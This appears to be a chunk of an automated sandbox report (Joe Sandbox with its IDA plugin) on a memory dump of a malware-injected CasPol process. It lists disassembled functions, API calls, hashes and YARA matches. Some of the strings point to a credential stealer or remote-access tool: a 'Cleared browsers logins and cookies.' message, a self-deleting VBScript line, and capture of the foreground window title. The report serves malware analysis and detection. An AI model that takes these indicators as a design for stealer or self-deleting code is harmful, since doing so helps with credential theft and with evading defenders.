                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                                                                                                                                  • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                                                                                                                                                  Function 10006C50 Relevance: 6.1, APIs: 4, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • new.LIBCMT ref: 10006C8E
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 10006D68
                                                                                                                                                                                                                                    • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 10006D6D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3339364867-0
                                                                                                                                                                                                                                  • Opcode ID: 2e818ad779f7f3d03d5c84d06b9865814cbd875c5e08a6123d96dc269186004b
                                                                                                                                                                                                                                  • Instruction ID: 4d0b3fd10050543d74c0a9d0191834ad5b053cb97790e6a37b58efb3ad3a7c81
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e818ad779f7f3d03d5c84d06b9865814cbd875c5e08a6123d96dc269186004b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3310775B001059FEB04DF68CDC196977E6EF483C0724816AE80A8F24DD731EE51C791
                                                                                                                                                                                                                                  Function 100046F0 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 1000476A
                                                                                                                                                                                                                                    • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 1000477F
                                                                                                                                                                                                                                  • new.LIBCMT ref: 10004785
                                                                                                                                                                                                                                  • new.LIBCMT ref: 10004799
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3339364867-0
                                                                                                                                                                                                                                  • Opcode ID: 68b20fe3f0c7c7f050f6ef4f1c12fb3c291c9bfd78cfe9bd81b3364575ba11aa
                                                                                                                                                                                                                                  • Instruction ID: b996118a61bf9d45cc2d2cea6005222f19e008b26fe8e61431029879d97c69ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68b20fe3f0c7c7f050f6ef4f1c12fb3c291c9bfd78cfe9bd81b3364575ba11aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 903106F5A046019FE720CF24D98161AB3E5FB457D0F220B2DE82ACB684DF30E944C7A5
                                                                                                                                                                                                                                  Function 045786E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,04576FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 04578731
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 045787BA
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 045787CC
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 045787D5
                                                                                                                                                                                                                                    • Part of subcall function 045756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04575702
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                  • Opcode ID: f1218e2d70502ea62187e85aa06525d3d0e67893b0d0208a8b28f8c4d84989fe
                                                                                                                                                                                                                                  • Instruction ID: d05a502403dda35f647f4228dbe8358e9f82ebfe8eef43289cec8d92d017ba45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1218e2d70502ea62187e85aa06525d3d0e67893b0d0208a8b28f8c4d84989fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A231AD32A0021AABDF24AF65EC89DAF7BA5FF40714F040178EC05DA150E736E954EBA0
                                                                                                                                                                                                                                  Function 1001CE1E Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,0BFC45C6,00000008,00000000,00000000,1000310F,100147D8,100147D8,?,00000001,00000008,0BFC45C6,00000001,1000310F,00000000), ref: 1001CE6B
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1001CEF4
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1001CF06
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 1001CF0F
                                                                                                                                                                                                                                    • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                  • Opcode ID: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                  • Instruction ID: 21883209d994697de3a7c675a4d248267bdfb4ce84dfd65b2647a05d58818af6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5213e88b9c10004400c7bcab2351b664c992673cec8c149454ec87b9edb94029
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50319032A0021AABEB15CF64CC85DAE7BE6EF40750F150169FC14DA191EB35DDA1DBA0
                                                                                                                                                                                                                                  Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                                                                                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                                                                                                                                                  • API String ID: 3472027048-1236744412
                                                                                                                                                                                                                                  • Opcode ID: 7b7f459b3a518d521c6b6e0222063c242c8ca3f608cd25c5c9afa621b98467d5
                                                                                                                                                                                                                                  • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7f459b3a518d521c6b6e0222063c242c8ca3f608cd25c5c9afa621b98467d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                                                                                                                                                  Function 10008370 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • new.LIBCMT ref: 100083A9
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 1000843E
                                                                                                                                                                                                                                    • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 10008443
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3339364867-0
                                                                                                                                                                                                                                  • Opcode ID: 9c7f4d190aa0d829d6d0e818d8c2bd526bb9e2e241f98fdb36d256465825b0ff
                                                                                                                                                                                                                                  • Instruction ID: 23aa64f781752fb4dbb10d71724e045748c050331dec8ce7964fb18c31900350
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c7f4d190aa0d829d6d0e818d8c2bd526bb9e2e241f98fdb36d256465825b0ff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE2103B5A006035FFB18DF28C881A6EB794FB453D0B10473AE956C7259E731FB908791
                                                                                                                                                                                                                                  Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                                                                    • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenQuerySleepValue
                                                                                                                                                                                                                                  • String ID: @CG$exepath$BG
                                                                                                                                                                                                                                  • API String ID: 4119054056-3221201242
                                                                                                                                                                                                                                  • Opcode ID: 6a250457707edca1acedd13ec3ca0082f92bf78a10e43e74cbf2ccc6be57626a
                                                                                                                                                                                                                                  • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a250457707edca1acedd13ec3ca0082f92bf78a10e43e74cbf2ccc6be57626a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                                                                                                                                                  Function 004185F1 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
                                                                                                                                                                                                                                  • EnumDisplayDevicesW.USER32(?), ref: 00418652
                                                                                                                                                                                                                                  • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
                                                                                                                                                                                                                                  • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1432082543-0
                                                                                                                                                                                                                                  • Opcode ID: 1e20251fdec09666a9a8916a7f732ae6ea3fb948af866313831dbf64fa1c2fd0
                                                                                                                                                                                                                                  • Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e20251fdec09666a9a8916a7f732ae6ea3fb948af866313831dbf64fa1c2fd0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA
                                                                                                                                                                                                                                  Function 0041A98A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 188215759-0
                                                                                                                                                                                                                                  • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                                                                                                                  • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                                                                                                                                                                  Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                                                                                                                                                    • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                                                                                                                                    • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                                                                                                                                                                  • String ID: [ $ ]
                                                                                                                                                                                                                                  • API String ID: 3309952895-93608704
                                                                                                                                                                                                                                  • Opcode ID: ebd93478415d7ceaf08988c946588b0e8d461d13856b31c8a019e387675c6f26
                                                                                                                                                                                                                                  • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebd93478415d7ceaf08988c946588b0e8d461d13856b31c8a019e387675c6f26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                                                                                                                                                  Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3604237281-0
                                                                                                                                                                                                                                  • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                  • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                                                                                                                                                  Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                                  • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                                                                                                                                                  Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                  • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                                                                                                                                                  Function 100152B4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
